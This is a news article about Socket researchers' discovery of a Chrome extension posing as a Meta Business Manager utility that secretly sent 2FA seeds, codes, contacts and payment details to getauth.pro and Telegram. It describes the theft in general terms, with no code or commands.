Malicious Chrome Extension Steals 2FA from Meta Business Manager

Security researchers at Socket have identified a malicious Chrome extension called "CL Suite by @CLMasters" that disguises itself as a useful tool for managing data from Meta Business Manager. Instead, it steals extremely sensitive information from victims, such as two-factor authentication (2FA) codes.

The extension was publicly available in the Chrome Web Store, Google Chrome's official extension store, raising concerns about the security of tools available to users.

How the Extension Works

A browser extension is a small program that adds extra functionality to the platform. To function, they require permissions to access certain content from visited websites, which poses a potential security risk.

The malicious extension was marketed as a solution to "extract data, analyze Business Managers, remove verification pop-ups, and generate 2FA codes." It requested broad access to the domains meta.com and facebook.com.

Administrative panels like Meta Business Suite and Facebook Business Manager are used by organizations to manage their social media presence. Any extension that can access these tools has access to valuable business data.

The most common targets for extensions that promise conveniences are digital marketers, social media managers, and performance analysts who seek tools to facilitate information export.

Details of the Extension

The extension was published under the pseudonym CLMasters and was released on March 1, 2025, with its last update on March 6, 2025. Despite having only 28 installs at the time of discovery, victims risk losing control over corporate assets.

The developer of the extension claimed that 2FA secrets were stored locally and not sent to external servers. However, analysis revealed that the extension sent all content to getauth.pro, including TOTP (Time-based One-Time Password) seeds, current codes, and login data.

The Role of TOTP Seeds

When enabling two-factor authentication, the user scans a QR code containing a TOTP "seed," the secret key that generates six-digit codes. The security of this method relies on protecting the seed; if it is compromised, the security of the 2FA is broken.

Attack Infrastructure

The extension's code included fixed URLs for data exfiltration, validation, and notifications. All users used the same authentication token, and the system collected the victim's public IP address.

Tests confirmed the activity of the infrastructure, which had a valid TLS certificate, indicating maintenance. The code collected data in modules and sent them to Telegram, prioritizing invisibility over transparency.

Detailed 2FA Theft

After generating the TOTP, the module sent packets with the complete seed, the current six-digit code, the Facebook identifier, and the account email, allowing criminals to sync their code generators with those of the victims.

Additionally, the code of the extension reported the use of the generator to getauth.pro without the victim's consent.

Contact Extraction

The "People Extractor" module compiled data from co-workers when the user accessed the "People" section of the Business Manager, extracting information such as names and emails, and sending them to the criminals under the guise of convenient export.

Collection of Analytics and Payment Details

Another module conducted silent collections of information about Business Manager IDs, advertising accounts, and payment methods, allowing criminals to gain an overview of the victims' financial infrastructure.

Potential Uses of Stolen Data

The combination of this information allows for fraud in advertising campaigns, phishing directed at employees, and asset hijacking. Despite the extension's uninstallation, sensitive data remains in the hands of criminals, requiring rigorous security actions from victims.

At the time of publication, the extension continued to be available in the Chrome Web Store, posing an ongoing risk to new users. Online security requires constant attention, especially concerning seemingly useful tools.